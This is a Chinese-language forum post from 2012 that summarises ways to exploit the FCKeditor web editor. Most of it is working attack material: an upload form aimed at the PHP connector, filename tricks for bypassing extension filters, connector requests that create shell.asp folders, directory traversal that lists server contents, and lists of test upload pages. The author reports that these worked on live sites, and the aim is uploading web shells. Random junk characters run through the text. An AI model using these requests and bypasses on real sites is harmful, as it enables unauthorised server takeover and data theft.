Fckeditor漏洞利用总结 ; u0 r. x( g7 z' {
查看编辑器版本
& @: `5 P# d# {5 M( B1 C4 _FCKeditor/_whatsnew.html1 _( l8 A! [" h
—————————————————————————————————————————————————————————————* E9 [' G( P, k1 }4 B
* C, S7 t$ E$ A1 f: `/ j: ~7 J
2. Version 2.2 版本# a6 }4 J! L _* p5 T; _
Apache+linux 环境下在上传文件后面加个.突破!测试通过。: }, ?# h3 \- M5 ^
—————————————————————————————————————————————————————————————
' M9 U5 k6 W8 c6 Z
, \- C, z; n+ @# w/ S8 c- n2 m3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。% N5 J$ @3 v1 T8 P
<form id="frmUpload" enctype="multipart/form-data"
3 a6 @+ ~+ N, W4 d" faction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>0 B* H9 A3 J& X/ e+ V, I2 h" `
<input type="file" name="NewFile" size="50"><br>
) E* R* B) c' I$ _: m) |<input id="btnUpload" type="submit" value="Upload"># i) ^. Q) @4 W$ E( H
</form>
4 s' K" [1 e0 k—————————————————————————————————————————————————————————————- ^2 Z% U1 E6 ~
3 X8 r2 B) h9 U1 F" T) x0 [. R' N2 @; u
4.FCKeditor 文件上传“.”变“_”下划线的绕过方法& V* q9 `+ x4 f7 b' R* ~; j2 d& }
很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。4 p: e' w+ H- u; C/ H+ k* B
4.1:提交shell.php+空格绕过& O0 }: S! p! X# |+ Q
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。4 u6 ^% k$ N; N" V7 P$ |
4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
: X9 ], k" U5 U8 b' a0 Q—————————————————————————————————————————————————————————————
0 } T" K% L5 ]) Z8 I
, U) Y0 k" k8 ?. e ?5. 突破建立文件夹. G9 G7 N2 C+ a' q2 w
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
$ ^1 ?2 q" {. N Z2 tFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp0 Q" w9 _+ T' p# |/ Z2 A* T
—————————————————————————————————————————————————————————————
* ?3 q6 P$ P5 F0 `5 q9 d% P
4 s) ^. G: s d4 r7 [& G6. FCKeditor 中test 文件的上传地址. d& q4 c U) r
FCKeditor/editor/filemanager/browser/default/connectors/test.html
3 K- J5 u6 H, G" h. E% K/ jFCKeditor/editor/filemanager/upload/test.html" y* J4 x1 F8 |" I# _2 [
FCKeditor/editor/filemanager/connectors/test.html: q G& W: j9 B& o
FCKeditor/editor/filemanager/connectors/uploadtest.html
* ?& @# x) o8 [ b4 n" N( X—————————————————————————————————————————————————————————————* ~# X; Y8 A- ^0 m4 p8 s, [/ m
$ [) [) a2 J, F# T7.常用上传地址
7 S8 T& D3 b( F) x# \FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
7 H) ~- e) g/ K9 i% K' ]FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp; i* [( w) o3 g0 d. Z# M$ E9 T( f
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过). t- A$ c2 ^/ _2 @9 D1 D4 c! F1 ~/ x
JSP 版:$ J1 A# ^8 |6 e5 q7 i
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp M; }8 |- a5 ]0 l. S4 K- M
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文7 \8 ^- s2 m( y3 }1 C. O4 W
件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。% E8 e( [8 [5 i5 y) ~5 C
—————————————————————————————————————————————————————————————
) K& ]: J/ y, O' C
# i9 ^1 e1 T& I8.其他上传地址
0 N" D5 v' J5 N* D. kFCKeditor/_samples/default.html
4 \$ \" t6 A" p) \- S9 s- u; RFCKeditor/_samples/asp/sample01.asp
9 a# ^2 b6 P1 R0 p% {6 i) i) i* BFCKeditor/_samples/asp/sample02.asp
8 b% e* Z& M0 GFCKeditor/_samples/asp/sample03.asp
' ?8 q+ {; Q' j& F; eFCKeditor/_samples/asp/sample04.asp9 j' R! k% p% A2 N! u8 b
一般很多站点都已删除_samples 目录,可以试试。
, t7 {# V! W( JFCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
4 x. \ w% F- ~+ ]7 W2 q. R—————————————————————————————————————————————————————————————: o, ~/ p, {3 F/ I: `
6 }5 H; ]0 T" j. v! H0 a* M6 w) [9.列目录漏洞也可助找上传地址6 u7 g' l$ z( l! [+ N* W
Version 2.4.1 测试通过5 x# m# P- P9 B% D4 T/ w
修改CurrentFolder 参数使用 ../../来进入不同的目录
0 | A; {5 }5 v8 [: l& J& S5 I" R3 `; h/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
* X( F: w/ x) Y) i根据返回的XML 信息可以查看网站所有的目录。& `3 A% {( V: s% ?1 h' m$ e
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
9 v* r- Q1 q6 a1 F. X, S也可以直接浏览盘符:
) ^; K$ S l: j W7 fJSP 版本:. s" Y8 A- g% T( Q- q: P% G1 t7 y5 H
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F8 ~& n" _) C6 g& R
—————————————————————————————————————————————————————————————8 ~. ~( z1 @+ g+ [* o7 G
4 a$ N" C9 s9 @) g n
10.爆路径漏洞
+ _! B: `1 l. n# @$ HFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp6 v e' Y4 B) w/ a% E4 i- s2 }1 j
—————————————————————————————————————————————————————————————
) H( Z! C6 F) A4 Y1 E y( i, V+ `! c
11. FCKeditor 被动限制策略所导致的过滤不严问题' \0 Q' s$ O: Y0 ]
影响版本: FCKeditor x.x <= FCKeditor v2.4.3
& N |! @ |- N6 x: l脆弱描述:0 @+ F1 b& X3 x
FCKeditor v2.4.3 中File 类别默认拒绝上传类型:5 K% W8 C% f* A/ x
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
1 t: {2 @- E$ r: }$ b2 E0 ^) ]Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!% H5 Y& {7 r3 b# J) w
而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
k2 A( p0 S& e 在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!" D# g* a+ ^; y* u
—————————————————————————————————————————————————————————————
) j& C0 h1 S# r+ }9 Y
3 i* Q" F! n- f" q1 G0 x* f12.最古老的漏洞,Type文件没有限制!
% F( d& {6 M- v% k* g5 C6 u0 H 我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本!
2 d U- s) |9 b6 K, C/ |3 n" f" E2 H—————————————————————————————————————————————————————————————7 V- M7 l4 H! e* ?
3 `9 w, F7 J3 z5 B+ L===============================================================================================================================================% t& H) e4 B: X; \8 ?! w) ?, O
2 U' f1 ]) S& A8 ?' B& N
FCK编辑器jsp版本漏洞:9 C& d1 |/ A1 f5 r1 e4 B
9 a; f/ y$ e7 ?- p0 P- s1 ]
! h. g" O# L% y4 R" [) vhttp://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F8 G: T: F9 `0 B' Y7 V( }! j
$ o3 Z( T/ F/ y6 |6 K8 v) g上传马所在目录
$ U4 L& g! c! e) C6 C q6 z; g7 ~FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
0 z# y3 k, r# s0 A2 E7 G上传shell的地址:
$ j3 ~5 ~0 J1 O; |" y: v8 whttp://www.xxx.com/fckeditor/edi ... ctors/jsp/connector
1 B; [! R4 l" r3 G0 T$ Q! O: ~跟版本有关系.并不是百分百成功. 测试成功几个站.# i5 V1 w8 ]1 `: g
不能通杀.很遗憾.
7 ]! i7 b. _. r7 s3 ehttp://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector3 M$ B& p5 i7 u. q% k0 y
如果以上地址不行可以试试% Z# |6 F* `) r& [- O1 Z
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector8 T6 d& ]) x+ r/ b/ O
FCKeditor/_samples/
- u. \- e% U8 t2 yFCKeditor/_samples/default.html7 l |* f" h7 o2 J3 y6 H9 b
FCKeditor/editor/fckeditor.htm
) v( D5 D% ^6 p Y* \FCKeditor/editor/fckdialog.html' O- l# z% q, }2 R! r& m. w% {
! Z Z# K& @" ^- h; C# m. } ?6 s4 o! G
% `7 Z: x0 m; v" Y解析漏洞+未重命名文件时上传漏洞 1.asp;jpg
; V1 {- l9 w- v. ]) f |
发表于 2012-9-13 17:01:39
收藏
支持
反对